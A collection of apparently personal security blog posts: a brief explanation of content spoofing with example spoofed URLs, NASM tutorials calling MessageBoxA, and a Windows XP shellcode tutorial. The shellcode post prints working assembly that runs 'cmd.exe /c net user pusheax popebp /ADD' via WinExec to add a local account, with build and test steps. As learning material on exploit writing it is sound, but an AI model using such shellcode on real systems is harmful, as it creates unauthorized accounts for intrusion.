Content spoofing attack (Brother of Reflected XSS)!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Content spoofing is altering data/text of web pages. XSS uses <script> or any other JS  (E.G: <script>alert(1)</script> whereas  Content spoofing not. It can be using text or html code. A hacker can deface the page virtually. But not able to own the server/web.

Since there are two good explanation of this vulnerability so you better read there:

https://www.owasp.org/index.php/Content_Spoofing
http://projects.webappsec.org/w/page/13246917/Content%20Spoofing

Something like this:
https://www.owasp.org/index.php/Pusheax.com_is_a_independent_penetration_tester,_ethical_hacker_who_always_love_to_learn_new_things_and_share_knowledge.Knowledge_should_be_free_but_not_the_hard_work._There_is_nothing_perfect.

http://projects.webappsec.org/w/page/13246917/%28pusheax%20is%20a%20regular%20independent%20pentester%20,%20I%20love%20to%20learn%20new%20things,and??

It is not such a powerful to hack entire server or an website but sometime these kind of vulnerability is enough to make the users fool.

(N)ASM LoadLibrary,GetProcAddress and MessageBox!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

When i was reading shellcode writing tutorial The LoadLibrary and GetProcAddress was been just confused me. But it was really easy to understand in normal asm code. It was bit harder for me when i first tried to write a bit dynamic windows shellcode.  So for understanding the dynamic dll loading in shellcode first i decide to learn to load the dll dynamically in normal (n)asm code and it was easy:

section .data

ldlibry dd 0
pro dd 0
dll db "user32.dll",0
myFtion db "MessageBoxA",0
MSG db "ASM GetProcAddress",0

extern _LoadLibraryA@4
extern _FreeLibrary@4
extern _GetProcAddress@8
extern _ExitProcess@4

global _start

section .text

_start:
push dll ;push user32.dll
call _LoadLibraryA@4 ;Call the API.
mov [ldlibry],eax ;eax hold return address. So eax=LoadLibrary("user32.dll") and now ldlibry=LoadLibrary("user32.dll")

;now we need to call GetProcAddress

push myFtion ;The API name we are going to call
push eax ;LoadLibrary("user32.dll")
call _GetProcAddress@8 ;GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA"). Again eax holding the return address


push 0x0 ;MB_OK
push MSG ;TITLE="ASM GetProcAddress"
push MSG ;Messgage="ASM GetProcAddress"
push 0 ;Reserved=0
call eax ;Call MessageBoxA through GetProcAddress.

push dword [ldlibry] ; ldlibry holding the LoadLibrary("user32.dll"). Again load to Free up.
call _FreeLibrary@4 ;Call the Windows api FreeLibrary()

;We should exit the process otherwise it may cause "access violation"
push 0 ;load 0 to stack
call _ExitProcess@4 ;Call ExitProcess


;Assembl:
;nasm -fwin32 ldlibrary.asm
;ld -o ldlibrary.exe ldlibrary.obj -lkernel32 

My first shellcode was in two registers, The adduser shellcode!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I always tried to learn to write simple shellcode in assembly language. But writing the shellcode was not my first interest , my interest was Exploit writing. I had to learn to understand assembly language for various reason such as Understanding how computer works, Effectively use of Debugger, Exploit writing,fun etc. So i searched on Google a lots “Writing shellcode” , Fortunately I found some amazing tutorials(Reference!). I will explain each line of my first shellcode below. Before that i want to tell that what tools i used to write this shellcode:

1. Nasm: www.nasm.us

2. arwin: http://www.vividmachines.com/shellcode/arwin.c

3. xxd-shellcode: http://www.projectshellcode.com/downloads/xxd-shellcode.sh

4. shellcode-test: http://www.vividmachines.com/shellcode/shellcodetest.c

The shellcode:

;add user shellcode. Only will work on windows xp3. Written by pusheax.com 
[BITS 32]

global _start

section .text

_start:
jmp short command


function: ;Label
;WinExec("Command to execute",NULL)
pop ecx
xor eax,eax
push eax
push ecx
mov eax,0x7c8623ad
call eax

xor eax,eax
push eax
mov eax,0x7c81cafa
call eax



command: ;Label
call function
db "cmd.exe /c net user pusheax popebp /ADD"
db 0x00


So let me explain each line

[BITS 32] : Tell the nasm the code is for 32bit.

global _start : Declare main starting label .

section .text : Declare the code section.

jmp short command: jmp instruction used for jumping to another label call “command” . “Call” instruction is not possible because “call” will save then next instruction to stack to get back to next instruction. This is really a common trick when writing shellcode. So it is telling to jump to “command” label and keep no return address in stack.

So now we are in label “command” and it holds following instructions:-

call function : Calling “function” label and saving the next address(whatever) in stack for return purpose . The Next instruction is simple system command:

 db “cmd.exe /c net user pusheax popebp /ADD”

So whatever , we are in label “function” 
There is a simple windows API  we need call is WinExec(), http://msdn.microsoft.com/en-us/library/windows/desktop/ms687393%28v=vs.85%29.aspx  . It only requires two parameter.

pop     ecx : Take the current return address into ecx and remove the address from stack.

xor     eax,eax : cleaning the eax register to 0. We can directly push 0 to stack but clearly it will issue null bytes. So most shellcoder does xor.

push     eax : pushing 0 to stack. Since Stack is LIFO so it will be the last parameters.

push     ecx : Do you remember that we have popped an address into ecx ? ecx actually holding “cmd.exe /c net user pusheax popebp /ADD” . So we need to push this string to stack for WinExec() first parameter. Currently stack holds: WinExec(“cmd.exe /c net user pusheax popebp /ADD”,NULL).

mov     eax,0x7c8623ad :   0x7c8623ad is address of WInExec(). Moving this address into eax . I found this address using arwin.exe ( ./arwin.exe Kernel32.dll WinExec ).

call      eax : eax=WinExec(). So it is executing the API function.

xor    eax,eax: clean eax register. Because we are going to terminate the current process soon. We are going to call ExitProcess() function to exit the current process. otherwise shellcode may get corrupted. You may see it on Debugger. 

 push   eax: Same as above we are pushing the last parameters to stack.

mov     eax,0x7c81cafa : Same as above i used arwin to find the address of ExitProcess() function.

call      eax: eax=ExitProcess’s address. Calling eax will execute the function.

Test

1. nasm -f bin -o shellcode.bin
2. ./xxd-shellcode.sh shellcode.bin
3. paste into the shellcode-test.c:
4. compile with mingw and execute then check the new user name :).

 Reference:

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

http://projectshellcode.com/node/20

(N)ASM windows MessageBox , import dll

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Mostly i use NASM, GCC, LD for programming practices! Because I use Linux as my primary Operating system, So i love to use cross-platform application.

I am not an asm coder, in past i have searched a lots for ASM(nasm) code of MessagBox() function Example just to get started. Because everything was fairly new to me(i had no clue!). So i just decided to post a simple example code which was my first assembly program for windows, in case someone is searching for basic example for getting started. I hope it will be useful to someone who is in same situation as i was!

First Example:

extern _ExitProcess@4
extern _MessageBoxA@16

global _main

section .data
msgb db "pusheax.com!",0
title db "Security Research!",0
section .text

_main:

push dword 0x00
;mov esi,msgb
;push esi
push dword title
push dword msgb
push dword 0
call _MessageBoxA@16

push 0
call _ExitProcess@4

“extern” is importing symbol from other module. In our case the symbols are _ExitProcess@4 and _MessageBoxA@16. There are three things we see are:

1. underscore before MessageBoxA .
2. @4/16 

The underscore used for calling the function in C style, Linux does not have underscore(_). And @4/16 indicating that how many parameter for the calling function. Such as MessageBox has 4 parameters. Each parameters are 4 bytes so 4 parameters are (4*4) 16bytes=4 . Extra “A” for ANSI-C .

“global _main” , declaring it as startup of our asm instructions(C style).

“Section .data” , you know what is it! Declaring uninitialized data such as variable.

in “section .text” (our codes) there are all parameters pushed to stack in reverse mode. I have called MessageBox(see here: http://msdn.microsoft.com/en-us/library/windows/desktop/ms645505%28v=vs.85%29.aspx ). The MessageBox in C should be like this:

MessageBox(NULL,msgb,title,0x00000000L)

in ASM it is opposite:

First pushing the 0x00000000L(MB_OK) to stack. Currently top of the stack!
Then pushing “title” . “title” is now top of the stack.
Then pushing “msgb”. Same as above. “msgb(string)” top of the stack .
And last push is 0 . Same as above.
At last call the function.

Stack is LIFO(Last in first out). So it is now:

MessageBox(NULL,msgb,title,0x00000000L)

 It is always always good idea terminating the current process so ExitProccess() function has been called when MessageBox() operation is completed.

Compile the code :
nasm -fwin32 msg.asm
gcc msg.obj -o msg.exe

But I want to import specific dll because all dlls are not loaded so some API function may not work if i can’t load the dll in my code. How i do this ? “import MessageBoxA@16 user32.dll” ? I think this is not going to happen for me because nasm will not generate win32 object file(Perhaps issue). So i need to work with obj (nasm -fobj msg.asm) but another issue is gcc won’t compile the obj file.. I used ALINK (Download: http://alink.sourceforge.net/), This what we want instead using gcc/LD (maybe)? But still LD can be used to compile it by linking library with (-l) . Here is the code i have assembled with nasm and compiled with alink.exe:

import MessageBoxA user32.dll ;Include the dll user32.dll
extern MessageBoxA ; Now calling external symbol without underscore....

section .data
msgme db "Hi",0 ;Say "Hi" to pusheax.com

section .text use32 CLASS=CODE ;"use32 CLASS=CODE for telling the other linker(Such as alink.exe) that program for 32bit

..start: ; ..start (not _start) for other linker for start of the code

push dword 0x00 ; MB_OK
mov esi,msgme ;esi="Hi"
push esi ;"Hi" is now top of the stack, second paramaters title
push dword msgme ; Say "Hi"
push dword 0 ;Reserve
call [MessageBoxA] ;Call the Function

;nasm -fobj msg2.asm
;alink -oPE msg2.obj

 If we use ld(with gcc) then our command should be ld -o what.exe what.obj -luser32.dll whereas alink.exe -oPE what.exe but nasm. For alink we don’t need to declare how many parameters , underscore etc and for ld we need to declare all the required things and extra option “-l” to link dll.  

Which Linker you will use?